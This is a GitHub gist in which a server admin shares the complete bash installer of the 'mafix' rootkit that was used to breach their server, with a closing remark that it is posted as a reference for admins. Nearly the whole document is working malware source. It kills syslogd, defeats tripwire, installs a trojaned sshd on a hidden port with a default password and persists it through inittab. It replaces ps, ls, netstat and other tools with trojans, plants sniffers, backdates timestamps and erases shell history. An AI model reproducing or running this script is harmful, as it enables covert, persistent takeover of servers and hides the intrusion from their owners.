Created
March 21, 2014 04:17
-
-
Save bhurlow/9679421 to your computer and use it in GitHub Desktop.
backdoor script used to breach one of my servers
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
###################### | |
# mafix 0.2 # | |
# fud 2009/07/15 # | |
###################### | |
BASEDIR=`pwd` | |
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin | |
BLK='[1;30m' | |
MAG='[1;35m' | |
CYN='[1;30m' | |
RED='^[[1;32m' | |
DMAG='[1;37m' | |
RES='[0m' | |
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}" | |
echo "${CYN} /__/\ / /\ / /\ ${DMAG} ___ ${CYN} /__/| ${RES}" | |
echo "${CYN} | |::\ / /::\ / /:/_ ${DMAG} / /\ ${CYN} | |:| ${RES}" | |
echo "${CYN} | |:|:\ / /:/\:\ / /:/ /\ ${DMAG} / /:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} __|__|:|\:\ / /:/~/::\ / /:/ /:/ ${DMAG}/__/::\ ${CYN} __|__|:| ${RES}" | |
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/ ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}" | |
echo "${CYN} \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ ${DMAG} \ \:\/\ ${CYN} ~\~~\::::/${RES}" | |
echo "${CYN} \ \:\ \ \::/ \ \::/ ${DMAG} \__\::/${CYN} |~~|:|~~ ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} /__/:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} \__\/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \__\/ \__\/ \__\/ ${DMAG} ${CYN} |__|/ ${RES}" | |
echo "${DMAG}${RES}" | |
echo "${DMAG} - the ferrari of rootkits - ${RES}" | |
sleep 5 | |
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}" | |
tar zxf mafixlibs | |
if [ "$(whoami)" != "root" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}" | |
exit | |
fi | |
cd $BASEDIR | |
sleep 1 | |
killall -9 syslogd >/dev/null 2>&1 | |
startime=`date +%S` | |
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}" | |
SYSLOGCONF="/etc/syslog.conf" | |
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2` | |
if [ ! -z "$REMOTE" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}" | |
echo | |
for host in $REMOTE; do | |
echo -n " " | |
echo $host | |
done | |
echo | |
echo ' ${CYN}coz this box is logging to it${RES}' | |
echo | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}" | |
fi | |
uname=`uname -n` | |
twd=/var/lib/tripwire/$uname.twd | |
if [ -d /etc/tripwire ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}" | |
if [ -f /var/lib/tripwire/$uname.twd ]; then | |
chattr -isa $twd | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}" | |
fi | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}" | |
fi | |
# restoring login | |
if [ -f /sbin/xlogin ]; then | |
chattr -isa /sbin/xlogin | |
chattr -isa /bin/login | |
mv -f /sbin/xlogin /bin/login | |
chmod 7455 /bin/login | |
chattr +isa /bin/login | |
fi | |
echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}" | |
if [ -f /etc/sh.conf ]; then | |
chattr -isa /etc/sh.conf | |
rm -rf /etc/sh.conf | |
fi | |
# checking if we got needed libs and filez | |
if [ ! -f /lib/libproc.a ]; then | |
mv bin/lib/libproc.a /lib/ 2>/dev/null | |
fi | |
if [ ! -f /lib/libproc.so.2.0.6 ]; then | |
mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null | |
fi | |
echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}" | |
/sbin/ldconfig >/dev/null 2>&1 | |
if [ ! -f /usr/bin/md5sum ]; then | |
touch -acmr /bin/ls bin/md5sum | |
cp bin/md5sum /usr/bin/md5sum | |
fi | |
DEFPASS=race | |
DEFPORT=11111 | |
if test -n "$1" ; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}" | |
cd $BASEDIR/bin | |
echo -n $1|md5sum > /etc/sh.conf | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}" | |
echo -n $DEFPASS|md5sum > /etc/sh.conf | |
fi | |
touch -acmr /bin/ls /etc/sh.conf | |
chown -f root:root /etc/sh.conf | |
chattr +isa /etc/sh.conf | |
if test -n "$2" ; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}" | |
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config | |
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h | |
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h | |
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2 | |
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null | |
else | |
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}" | |
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config | |
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h | |
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h | |
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2 | |
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null | |
fi | |
if [ -f /lib/lidps1.so ]; then | |
chattr -isa /lib/lidps1.so | |
rm -rf /lib/lidps1.so | |
fi | |
if [ -f /usr/include/hosts.h ]; then | |
chattr -isa /usr/include/hosts.h | |
rm -rf /usr/include/hosts.h | |
fi | |
if [ -f /usr/include/file.h ]; then | |
chattr -isa /usr/include/file.h | |
rm -rf /usr/include/file.h | |
fi | |
if [ -f /usr/include/log.h ]; then | |
chattr -isa /usr/include/log.h | |
rm -rf /usr/include/log.h | |
fi | |
if [ -f /usr/include/proc.h ]; then | |
chattr -isa /usr/include/proc.h | |
rm -rf /usr/include/proc.h | |
fi | |
cd $BASEDIR | |
mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null | |
touch -acmr /bin/ls /lib/lidps1.so | |
touch -acmr /bin/ls $BASEDIR/bin/headers/* | |
mv $BASEDIR/bin/headers/* /usr/include/ 2>/dev/null | |
# Ok lets start creating dirs | |
SSHDIR=/lib/libsh.so | |
HOMEDIR=/usr/lib/libsh | |
if [ -d /lib/libsh.so ]; then | |
chattr -isa /lib/libsh.so | |
chattr -isa /lib/libsh.so/* | |
rm -rf /lib/libsh.so | |
fi | |
if [ -d /usr/lib/libsh ]; then | |
chattr -isa /usr/lib/libsh | |
chattr -isa /usr/lib/libsh/* | |
rm -rf /usr/lib/libsh/* | |
fi | |
mkdir $SSHDIR 2>/dev/null | |
touch -acmr /bin/ls $SSHDIR | |
mkdir $HOMEDIR 2>/dev/null | |
touch -acmr /bin/ls $HOMEDIR | |
cd $BASEDIR/bin | |
mv .sh/* $SSHDIR/ 2>/dev/null | |
mv .sh/.bashrc $HOMEDIR 2>/dev/null | |
if [ -f /sbin/ttyload ]; then | |
chattr -AacdisSu /sbin/ttyload | |
rm -rf /sbin/ttyload | |
fi | |
if [ -f /usr/sbin/ttyload ]; then | |
chattr -isa /usr/sbin/ttyload | |
rm -rf /usr/sbin/ttyload | |
fi | |
if [ -f /sbin/ttymon ]; then | |
chattr -isa /sbin/ttymon | |
rm -rf /sbin/ttymon | |
fi | |
mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null | |
chmod a+xr /sbin/ttyload 2>/dev/null | |
chmod o-w /sbin/ttyload 2>/dev/null | |
touch -acmr /bin/ls /sbin/ttyload | |
chattr +isa /sbin/ttyload | |
kill -9 `pidof ttyload` >/dev/null 2>&1 | |
mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null | |
chmod a+xr /sbin/ttymon 2>/dev/null | |
touch -acmr /bin/ls /sbin/ttymon | |
chattr +isa /sbin/ttymon | |
kill -9 `pidof ttymon` >/dev/null 2>&1 | |
cp /bin/bash $SSHDIR | |
# INITTAB SHUFFLING | |
chattr -isa /etc/inittab | |
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1 | |
cat /etc/inittab |grep getty > /tmp/.init2 | |
echo "# Loading standard ttys" >> /tmp/.init1 | |
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1 | |
cat /tmp/.init2 >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# modem getty." >> /tmp/.init1 | |
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# fax getty (hylafax)" >> /tmp/.init1 | |
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# vbox (voice box) getty" >> /tmp/.init1 | |
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1 | |
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1 | |
echo "" >> /tmp/.init1 | |
echo "# end of /etc/inittab" >> /tmp/.init1 | |
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload | |
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload | |
touch -acmr /bin/ls /usr/sbin/ttyload | |
chmod +x /usr/sbin/ttyload 2>/dev/null | |
chattr +isa /usr/sbin/ttyload | |
/usr/sbin/ttyload >/dev/null 2>&1 | |
touch -amcr /etc/inittab /tmp/.init1 | |
mv -f /tmp/.init1 /etc/inittab 2>/dev/null | |
rm -rf /tmp/.init2 | |
# MAKING SURE WE GOT IT BACKDORED RIGHT ! | |
if [ ! "`grep ttyload /etc/inittab`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}" | |
fi | |
# Say hello to md5sum fixer boys n gurls ! | |
if [ -f /sbin/ifconfig ]; then | |
/usr/bin/md5sum /sbin/ifconfig >> .shmd5 | |
fi | |
if [ -f /bin/ps ]; then | |
/usr/bin/md5sum /bin/ps >> .shmd5 | |
fi | |
if [ -f /bin/ls ]; then | |
/usr/bin/md5sum /bin/ls >> .shmd5 | |
fi | |
if [ -f /bin/netstat ]; then | |
/usr/bin/md5sum /bin/netstat >> .shmd5 | |
fi | |
if [ -f /usr/bin/find ]; then | |
/usr/bin/md5sum /usr/bin/find >> .shmd5 | |
fi | |
if [ -f /usr/bin/top ]; then | |
/usr/bin/md5sum /usr/bin/top >> .shmd5 | |
fi | |
if [ -f /usr/sbin/lsof ]; then | |
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5 | |
fi | |
if [ -f /usr/bin/slocate ]; then | |
/usr/bin/md5sum /usr/bin/slocate >> .shmd5 | |
fi | |
if [ -f /usr/bin/dir ]; then | |
/usr/bin/md5sum /usr/bin/dir >> .shmd5 | |
fi | |
if [ -f /usr/bin/md5sum ]; then | |
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5 | |
fi | |
if [ ! -f /dev/srd0 ]; then | |
./encrypt -e .shmd5 /dev/srd0 | |
touch -acmr /bin/ls /dev/srd0 | |
chattr a+r /dev/srd0 | |
chown -f root:root /dev/srd0 | |
fi | |
rm -rf .shmd5 | |
# time change bitch | |
touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1 | |
touch -acmr /bin/ps ps >/dev/null 2>&1 | |
touch -acmr /bin/ls ls >/dev/null 2>&1 | |
touch -acmr /bin/netstat netstat >/dev/null 2>&1 | |
touch -acmr /usr/bin/find find >/dev/null 2>&1 | |
touch -acmr /usr/bin/top top >/dev/null 2>&1 | |
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1 | |
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1 | |
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1 | |
touch -acmr /usr/bin/dir dir >/dev/null 2>&1 | |
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1 | |
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1 | |
# Backdoor ps/top/du/ls/netstat/etc.. | |
cd $BASEDIR/bin | |
BACKUP=/usr/lib/libsh/.backup | |
mkdir $BACKUP 2>/dev/null | |
# ps ... | |
if [ -f /usr/bin/ps ]; then | |
chattr -isa /usr/bin/ps | |
cp /usr/bin/ps $BACKUP | |
mv -f ps /usr/bin/ps 2>/dev/null | |
chattr +isa /usr/bin/ps | |
fi | |
if [ -f /bin/ps ]; then | |
chattr -isa /bin/ps | |
cp /bin/ps $BACKUP | |
mv -f ps /bin/ps 2>/dev/null | |
chattr +isa /bin/ps | |
fi | |
# ifconfig ... | |
chattr -isa /sbin/ifconfig | |
cp /sbin/ifconfig $BACKUP | |
mv -f ifconfig /sbin/ifconfig 2>/dev/null | |
chattr +isa /sbin/ifconfig | |
# netstat ... | |
if [ -f /usr/sbin/netstat ]; then | |
chattr -isa /usr/sbin/netstat | |
mv -f netstat /usr/sbin/netstat 2>/dev/null | |
chattr +isa /usr/sbin/netstat | |
fi | |
chattr -isa /bin/netstat | |
cp /bin/netstat $BACKUP | |
mv -f netstat /bin/netstat 2>/dev/null | |
chattr +isa /bin/netstat | |
# top ... | |
if [ -f /usr/bin/top ]; then | |
chattr -isa /usr/bin/top | |
cp /usr/bin/top $BACKUP | |
mv -f top /usr/bin/top 2>/dev/null | |
chattr +isa /usr/bin/top | |
if [ -f /lib/libncurses.so.5 ]; then | |
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null | |
fi | |
if [ -f /usr/lib/libncurses.so.5 ]; then | |
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null | |
fi | |
fi | |
# slocate ... | |
if [ -f /usr/bin/slocate ]; then | |
chattr -isa /usr/bin/slocate | |
cp /usr/bin/slocate $BACKUP | |
mv -f slocate /usr/bin/slocate 2>/dev/null | |
chattr +isa /usr/bin/slocate | |
fi | |
# ls ... | |
chattr -isa /bin/ls | |
cp /bin/ls $BACKUP | |
mv -f ls /bin/ls 2>/dev/null | |
chattr +isa /bin/ls | |
# find ... | |
if [ -f /usr/bin/find ]; then | |
chattr -isa /usr/bin/find | |
cp /usr/bin/find $BACKUP | |
mv -f find /usr/bin/find 2>/dev/null | |
chattr +isa /usr/bin/find | |
fi | |
# dir ... | |
if [ -f /usr/bin/dir ]; then | |
chattr -isa /usr/bin/dir | |
cp /usr/bin/dir $BACKUP | |
mv -f dir /usr/bin/dir 2>/dev/null | |
chattr +isa /usr/bin/dir | |
fi | |
# lsof ... | |
if [ -f /usr/sbin/lsof ]; then | |
chattr -isa /usr/sbin/lsof | |
cp /usr/sbin/lsof $BACKUP | |
mv -f lsof /usr/sbin/lsof 2>/dev/null | |
chattr +isa /usr/sbin/lsof | |
fi | |
# pstree ... | |
if [ -f /usr/bin/pstree ]; then | |
chattr -isa /usr/bin/pstree | |
cp /usr/bin/pstree $BACKUP | |
mv -f pstree /usr/bin/pstree 2>/dev/null | |
chattr +isa /usr/bin/pstree | |
fi | |
# md5sum ... | |
chattr -isa /usr/bin/md5sum | |
cp /usr/bin/md5sum $BACKUP | |
mv -f md5sum /usr/bin/md5sum 2>/dev/null | |
chattr +isa /usr/bin/md5sum | |
echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}" | |
cd $BASEDIR | |
mkdir $HOMEDIR/.sniff 2>/dev/null | |
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null | |
chmod +x $BASEDIR/bin/sshd 2>/dev/null | |
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null | |
mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null | |
mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null | |
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff | |
touch -acmr /bin/ls $HOMEDIR/.sniff/shp | |
touch -acmr /bin/ls $HOMEDIR/shsb | |
touch -acmr /bin/ls $HOMEDIR/hide | |
chmod +x $HOMEDIR/.sniff/* 2>/dev/null | |
chmod +x $HOMEDIR/shsb 2>/dev/null | |
chmod +x $HOMEDIR/hide 2>/dev/null | |
./bin/sshd $1 $2 >> /dev/null | |
echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}" | |
ps aux > /tmp/.procs | |
if [ "`cat /tmp/.procs | grep named`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}" | |
fi | |
if [ -f /usr/sbin/wu.ftpd ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}" | |
fi | |
if [ "`cat /tmp/.procs | grep smbd`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}" | |
fi | |
if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}" | |
fi | |
rm -rf /tmp/.procs | |
netstat -natp > /tmp/.stats | |
if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then | |
echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}" | |
fi | |
rm -rf /tmp/.stats | |
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS | |
mkdir $HOMEDIR/.owned 2>/dev/null | |
if [ -f /etc/ttyhash ]; then | |
chattr -AacdisSu /etc/ttyhash | |
rm -rf /etc/ttyhash | |
fi | |
if [ -d /lib/ldd.so ]; then | |
chattr -isa /lib/ldd.so | |
chattr -isa /lib/ldd.so/* | |
mv /lib/ldd.so $HOMEDIR/.owned/tk8 | |
echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}" | |
fi | |
if [ -d /usr/src/.puta ]; then | |
chattr -isa /usr/src/.puta | |
chattr -isa /usr/src/.puta/* | |
mv /usr/src/.puta $HOMEDIR/.owned/tk7 | |
echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}" | |
fi | |
if [ -f /usr/sbin/xntpd ]; then | |
chattr -isa /usr/sbin/xntpd | |
rm -rf /usr/sbin/xntpd | |
fi | |
if [ -f /usr/sbin/nscd ]; then | |
chattr -isa /usr/sbin/nscd | |
rm -rf /usr/sbin/nscd | |
fi | |
if [ -d /usr/include/bex ]; then | |
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz | |
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h | |
chattr -isa /usr/include/bex | |
chattr -isa /usr/include/bex/* | |
mv /usr/include/bex/ $HOMEDIR/.owned/bex2 | |
if [ -f /var/log/tcp.log ]; then | |
chattr -isa /var/log/tcp.log | |
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog | |
fi | |
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1 | |
rm -rf /usr/bin/sshd2 >/dev/null 2>&1 | |
echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}" | |
fi | |
if [ -d /dev/tux/ ]; then | |
chattr -isa /usr/bin/xsf >/dev/null 2>&1 | |
rm -rf /usr/bin/xsf >/dev/null 2>&1 | |
chattr -isa /usr/bin/xchk >/dev/null 2>&1 | |
rm -rf /usr/bin/xchk >/dev/null 2>&1 | |
chattr -isa /dev/tux >/dev/null 2>&1 | |
mv /dev/tux $HOMEDIR/.owned/tuxkit | |
echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}" | |
fi | |
if [ -f /usr/bin/ssh2d ]; then | |
chattr -isa /usr/bin/ssh2d | |
rm -rf /usr/bin/ssh2d | |
chattr -isa /lib/security/.config/ | |
chattr -isa /lib/security/.config/* | |
rm -rf /lib/security/.config | |
echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}" | |
fi | |
if [ -f /etc/ld.so.hash ]; then | |
chattr -isa /etc/ld.so.hash | |
rm -rf /etc/ld.so.hash | |
fi | |
chattr +isa /usr/lib/libsh | |
chattr +isa /lib/libsh.so | |
# GREPPING SHITZ FROM rc.sysinit and inetd.conf | |
if [ -f /etc/rc.d/rc.sysinit ]; then | |
chattr -isa /etc/rc.d/rc.sysinit | |
cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/usr/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep | |
chmod +x /tmp/.grep | |
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep | |
mv -f /tmp/.grep /etc/rc.d/rc.sysinit | |
rm -rf /tmp/.grep | |
fi | |
if [ -f /etc/inetd.conf ]; then | |
chattr -isa /etc/inetd.conf | |
cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep | |
touch -acmr /etc/inted.conf /tmp/.grep | |
mv -f /tmp/.grep /etc/inetd.conf | |
rm -rf /tmp/.grep | |
fi | |
# KILLING SOME LAMME DAEMONS | |
killall -9 -q nscd >/dev/null 2>&1 | |
killall -9 -q xntps >/dev/null 2>&1 | |
killall -9 -q mountd >/dev/null 2>&1 | |
killall -9 -q mserv >/dev/null 2>&1 | |
killall -9 -q psybnc >/dev/null 2>&1 | |
killall -9 -q t0rns >/dev/null 2>&1 | |
killall -9 -q linsniffer >/dev/null 2>&1 | |
killall -9 -q sniffer >/dev/null 2>&1 | |
killall -9 -q lpsched >/dev/null 2>&1 | |
killall -9 -q sniff >/dev/null 2>&1 | |
killall -9 -q sn1f >/dev/null 2>&1 | |
killall -9 -q sshd2 >/dev/null 2>&1 | |
killall -9 -q xsf >/dev/null 2>&1 | |
killall -9 -q xchk >/dev/null 2>&1 | |
killall -9 -q ssh2d >/dev/null 2>&1 | |
echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}" | |
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-` | |
echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}" | |
uname -a | awk '{ print $11 }' >/tmp/info_tmp | |
echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}" | |
echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+- Might be ["`/sbin/ifconfig | grep \eth | wc -l`" ] active adapters.${RES}" | |
if [ -f /etc/redhat-release ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}" | |
elif [ -f /etc/slackware-version ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}" | |
elif [ -f /etc/debian_version ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}" | |
elif [ -f /etc/SuSE-release ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}" | |
elif [ -f /etc/issue ]; then | |
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}" | |
else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}" | |
fi | |
echo | |
echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}" | |
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE | |
if [ -f /.bash_history ]; then | |
chattr -isa /.bash_history >/dev/null 2>&1 | |
rm -rf /.bash_history | |
fi | |
if [ -f /bin/.bash_history ]; then | |
chattr -isa /bin/.bash_history | |
rm -rf /bin/.bash_history | |
fi | |
cd $BASEDIR | |
rm -rf /tmp/.r* | |
cd .. | |
rm -rf mafix* | |
echo -n "${CYN}done!${RES}" | |
echo | |
rm -rf /tmp/info_tmp | |
endtime=`date +%S` | |
echo | |
echo | |
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}" | |
echo "${CYN} /__/\ / /\ / /\ ${DMAG} ___ ${CYN} /__/| ${RES}" | |
echo "${CYN} | |::\ / /::\ / /:/_ ${DMAG} / /\ ${CYN} | |:| ${RES}" | |
echo "${CYN} | |:|:\ / /:/\:\ / /:/ /\ ${DMAG} / /:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} __|__|:|\:\ / /:/~/::\ / /:/ /:/ ${DMAG}/__/::\ ${CYN} __|__|:| ${RES}" | |
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/ ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}" | |
echo "${CYN} \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ ${DMAG} \ \:\/\ ${CYN} ~\~~\::::/${RES}" | |
echo "${CYN} \ \:\ \ \::/ \ \::/ ${DMAG} \__\::/${CYN} |~~|:|~~ ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} /__/:/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} \__\/ ${CYN} | |:| ${RES}" | |
echo "${CYN} \__\/ \__\/ \__\/ ${DMAG} ${CYN} |__|/ ${RES}" | |
echo "${DMAG}${RES}" | |
echo "${DMAG} Password: $1 ${RES}" | |
echo "${DMAG} Port: $2 ${RES}" | |
if [ -f /usr/sbin/syslogd ]; then | |
/usr/sbin/syslogd -m 0 | |
else | |
/sbin/syslogd -m 0 | |
fi | |
if [ -f /usr/sbin/inetd ]; then | |
killall -HUP inetd >/dev/null 2>&1 | |
elif [ -f /usr/sbin/xinetd ]; then | |
killall -HUP xinetd | |
fi | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
please note that I've included this script here as a reference for potential security violations.
I in no way intend to use a script like this to compromise any server resource.
this file is interesting however for linux server admins attempting to close security violations